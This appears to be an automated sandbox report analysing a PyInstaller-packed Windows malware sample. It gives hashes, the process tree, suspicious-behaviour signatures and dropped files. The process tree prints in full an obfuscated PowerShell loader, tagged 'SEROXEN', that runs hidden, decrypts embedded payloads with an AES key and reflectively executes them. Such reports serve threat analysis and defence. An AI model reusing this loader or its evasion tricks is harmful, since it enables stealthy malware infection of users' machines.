41d05bc57afb2fdbdb47134e6f908143c0fa8c2b0174287cf9d8338b2f88175c

Analysis

max time kernel
119s
max time network
145s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
03-11-2023 02:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8a576cdd4ebde3df344d5ed586fb77a6.exe
Size

40.4MB
MD5

8a576cdd4ebde3df344d5ed586fb77a6
SHA1

914b7e996125cd5a2418065c276fb41bf037c1e3
SHA256

41d05bc57afb2fdbdb47134e6f908143c0fa8c2b0174287cf9d8338b2f88175c
SHA512

027872452b0bdce1c983d2d8fa017190066b15e10971462865e1cbaa1f354a43e9747090c9481e69ccf85bef62f7c9a953f11ff5b7a44c0c84536122946aa023
SSDEEP

786432:Ebf1T1Vf0DP8HZwBNr0N8dn+7y96PRw+4URr673KVJZmEuV7:0fCiRwZGu

Score

7^/10

pyinstaller

Malware Config

Signatures

Executes dropped EXE 4 IoCs

pid	Process
2784	svhost.exe
1868	svhost.exe
3044	process.bat.exe
1316	Process not Found

Loads dropped DLL 4 IoCs

pid	Process
2804	8a576cdd4ebde3df344d5ed586fb77a6.exe
2784	svhost.exe
1868	svhost.exe
2648	cmd.exe

Detects Pyinstaller 6 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000c000000012265-11.dat	pyinstaller
behavioral1/files/0x000c000000012265-13.dat	pyinstaller
behavioral1/files/0x000c000000012265-15.dat	pyinstaller
behavioral1/files/0x000c000000012265-102.dat	pyinstaller
behavioral1/files/0x000c000000012265-101.dat	pyinstaller
behavioral1/files/0x000c000000012265-114.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3044	process.bat.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3044	process.bat.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2804 wrote to memory of 2648	2804	8a576cdd4ebde3df344d5ed586fb77a6.exe	28
PID 2804 wrote to memory of 2648	2804	8a576cdd4ebde3df344d5ed586fb77a6.exe	28
PID 2804 wrote to memory of 2648	2804	8a576cdd4ebde3df344d5ed586fb77a6.exe	28
PID 2804 wrote to memory of 2648	2804	8a576cdd4ebde3df344d5ed586fb77a6.exe	28
PID 2804 wrote to memory of 2784	2804	8a576cdd4ebde3df344d5ed586fb77a6.exe	30
PID 2804 wrote to memory of 2784	2804	8a576cdd4ebde3df344d5ed586fb77a6.exe	30
PID 2804 wrote to memory of 2784	2804	8a576cdd4ebde3df344d5ed586fb77a6.exe	30
PID 2804 wrote to memory of 2784	2804	8a576cdd4ebde3df344d5ed586fb77a6.exe	30
PID 2784 wrote to memory of 1868	2784	svhost.exe	31
PID 2784 wrote to memory of 1868	2784	svhost.exe	31
PID 2784 wrote to memory of 1868	2784	svhost.exe	31
PID 2648 wrote to memory of 3044	2648	cmd.exe	32
PID 2648 wrote to memory of 3044	2648	cmd.exe	32
PID 2648 wrote to memory of 3044	2648	cmd.exe	32
PID 2648 wrote to memory of 3044	2648	cmd.exe	32

C:\Users\Admin\AppData\Local\Temp\8a576cdd4ebde3df344d5ed586fb77a6.exe
"C:\Users\Admin\AppData\Local\Temp\8a576cdd4ebde3df344d5ed586fb77a6.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\process.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Users\Admin\AppData\Local\Temp\process.bat.exe
    "process.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function kvgAx($xxxoK){ $sNNhg=[System.Security.Cryptography.Aes]::Create(); $sNNhg.Mode=[System.Security.Cryptography.CipherMode]::CBC; $sNNhg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $sNNhg.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qul26veVRzYgwLrBh9+w+ec/rOt30s4PadKFpnT1vVA='); $sNNhg.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m86i2cqbabb3AGbPPfmZfw=='); $XEJIq=$sNNhg.CreateDecryptor(); $return_var=$XEJIq.TransformFinalBlock($xxxoK, 0, $xxxoK.Length); $XEJIq.Dispose(); $sNNhg.Dispose(); $return_var;}function VtZHJ($xxxoK){ $ntBHO=New-Object System.IO.MemoryStream(,$xxxoK); $dMZue=New-Object System.IO.MemoryStream; $RxuNA=New-Object System.IO.Compression.GZipStream($ntBHO, [IO.Compression.CompressionMode]::Decompress); $RxuNA.CopyTo($dMZue); $RxuNA.Dispose(); $ntBHO.Dispose(); $dMZue.Dispose(); $dMZue.ToArray();}function eOdsl($xxxoK,$FeuOh){ $wSPFp=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$xxxoK); $fshro=$wSPFp.EntryPoint; $fshro.Invoke($null, $FeuOh);}$kkFuI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\process.bat').Split([Environment]::NewLine);foreach ($zazVv in $kkFuI) { if ($zazVv.StartsWith('SEROXEN')) { $kOcfv=$zazVv.Substring(7); break; }}$Vljtr=[string[]]$kOcfv.Split('\');$GoLJy=VtZHJ (kvgAx ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Vljtr[0])));$MdFFu=VtZHJ (kvgAx ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Vljtr[1])));eOdsl $MdFFu (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));eOdsl $GoLJy (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3044
- C:\Users\Admin\AppData\Local\Temp\svhost.exe
  "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Users\Admin\AppData\Local\Temp\svhost.exe
    "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI27842\python310.dll

Filesize
4.3MB

MD5
deaf0c0cc3369363b800d2e8e756a402

SHA1
3085778735dd8badad4e39df688139f4eed5f954

SHA256
156cf2b64dd0f4d9bdb346b654a11300d6e9e15a65ef69089923dafc1c71e33d

SHA512
5cac1d92af7ee18425b5ee8e7cd4e941a9ddffb4bc1c12bb8aeabeed09acec1ff0309abc41a2e0c8db101fee40724f8bfb27a78898128f8746c8fe01c1631989

Download Submit
C:\Users\Admin\AppData\Local\Temp\process.bat

Filesize
12.5MB

MD5
4f0a8b11cd702cf34205add9c57b7843

SHA1
18a81c9b461a6df5c030abc69c44ed9d19c1bf22

SHA256
fd1fb98c658fc3cc9bf0239126e2a8fa484420269820e996da7773c9ea00e6ba

SHA512
400cce8c6956e038b169eff98c14c055c8741bbfe451d6979c9a7bbc25d6286644c2c342618fe1f06bf012ae696923e04e2fadc569d9b18fea6369d581c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\process.bat

Filesize
12.5MB

MD5
4f0a8b11cd702cf34205add9c57b7843

SHA1
18a81c9b461a6df5c030abc69c44ed9d19c1bf22

SHA256
fd1fb98c658fc3cc9bf0239126e2a8fa484420269820e996da7773c9ea00e6ba

SHA512
400cce8c6956e038b169eff98c14c055c8741bbfe451d6979c9a7bbc25d6286644c2c342618fe1f06bf012ae696923e04e2fadc569d9b18fea6369d581c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\process.bat.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\svhost.exe

Filesize
14.4MB

MD5
875ce764c726a29f106e46488f49e4b9

SHA1
983b0895f0356a0c356661a0b0b4f3a85430bd63

SHA256
6f0e1c59f141d0d663b9cc4525ffe089fbd4e5dfa9430fb85dfd8e8b4dd51803

SHA512
a12b441bd404f7f9c31e83215b5acdb9ccacab98bdd22a26bf06ebb24f8dd8353214829f2b7d6f2b498f02e71ee29a647da79cd2b2af418f6240ee0158fbc635

Download Submit
C:\Users\Admin\AppData\Local\Temp\svhost.exe

Filesize
14.4MB

MD5
875ce764c726a29f106e46488f49e4b9

SHA1
983b0895f0356a0c356661a0b0b4f3a85430bd63

SHA256
6f0e1c59f141d0d663b9cc4525ffe089fbd4e5dfa9430fb85dfd8e8b4dd51803

SHA512
a12b441bd404f7f9c31e83215b5acdb9ccacab98bdd22a26bf06ebb24f8dd8353214829f2b7d6f2b498f02e71ee29a647da79cd2b2af418f6240ee0158fbc635

Download Submit
C:\Users\Admin\AppData\Local\Temp\svhost.exe

Filesize
14.4MB

MD5
875ce764c726a29f106e46488f49e4b9

SHA1
983b0895f0356a0c356661a0b0b4f3a85430bd63

SHA256
6f0e1c59f141d0d663b9cc4525ffe089fbd4e5dfa9430fb85dfd8e8b4dd51803

SHA512
a12b441bd404f7f9c31e83215b5acdb9ccacab98bdd22a26bf06ebb24f8dd8353214829f2b7d6f2b498f02e71ee29a647da79cd2b2af418f6240ee0158fbc635

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI27842\python310.dll

Filesize
4.3MB

MD5
deaf0c0cc3369363b800d2e8e756a402

SHA1
3085778735dd8badad4e39df688139f4eed5f954

SHA256
156cf2b64dd0f4d9bdb346b654a11300d6e9e15a65ef69089923dafc1c71e33d

SHA512
5cac1d92af7ee18425b5ee8e7cd4e941a9ddffb4bc1c12bb8aeabeed09acec1ff0309abc41a2e0c8db101fee40724f8bfb27a78898128f8746c8fe01c1631989

Download Submit
\Users\Admin\AppData\Local\Temp\process.bat.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
\Users\Admin\AppData\Local\Temp\svhost.exe

Filesize
14.4MB

MD5
875ce764c726a29f106e46488f49e4b9

SHA1
983b0895f0356a0c356661a0b0b4f3a85430bd63

SHA256
6f0e1c59f141d0d663b9cc4525ffe089fbd4e5dfa9430fb85dfd8e8b4dd51803

SHA512
a12b441bd404f7f9c31e83215b5acdb9ccacab98bdd22a26bf06ebb24f8dd8353214829f2b7d6f2b498f02e71ee29a647da79cd2b2af418f6240ee0158fbc635

Download Submit
\Users\Admin\AppData\Local\Temp\svhost.exe

Filesize
14.4MB

MD5
875ce764c726a29f106e46488f49e4b9

SHA1
983b0895f0356a0c356661a0b0b4f3a85430bd63

SHA256
6f0e1c59f141d0d663b9cc4525ffe089fbd4e5dfa9430fb85dfd8e8b4dd51803

SHA512
a12b441bd404f7f9c31e83215b5acdb9ccacab98bdd22a26bf06ebb24f8dd8353214829f2b7d6f2b498f02e71ee29a647da79cd2b2af418f6240ee0158fbc635

Download Submit
\Users\Admin\AppData\Local\Temp\svhost.exe

Filesize
14.4MB

MD5
875ce764c726a29f106e46488f49e4b9

SHA1
983b0895f0356a0c356661a0b0b4f3a85430bd63

SHA256
6f0e1c59f141d0d663b9cc4525ffe089fbd4e5dfa9430fb85dfd8e8b4dd51803

SHA512
a12b441bd404f7f9c31e83215b5acdb9ccacab98bdd22a26bf06ebb24f8dd8353214829f2b7d6f2b498f02e71ee29a647da79cd2b2af418f6240ee0158fbc635

Download Submit
memory/2804-0-0x0000000000400000-0x0000000002C64000-memory.dmp

Filesize
40.4MB

Download
memory/3044-111-0x0000000074700000-0x0000000074CAB000-memory.dmp

Filesize
5.7MB

Download
memory/3044-112-0x0000000074700000-0x0000000074CAB000-memory.dmp

Filesize
5.7MB

Download
memory/3044-113-0x0000000002680000-0x00000000026C0000-memory.dmp

Filesize
256KB

Download
memory/3044-115-0x0000000074700000-0x0000000074CAB000-memory.dmp

Filesize
5.7MB

Download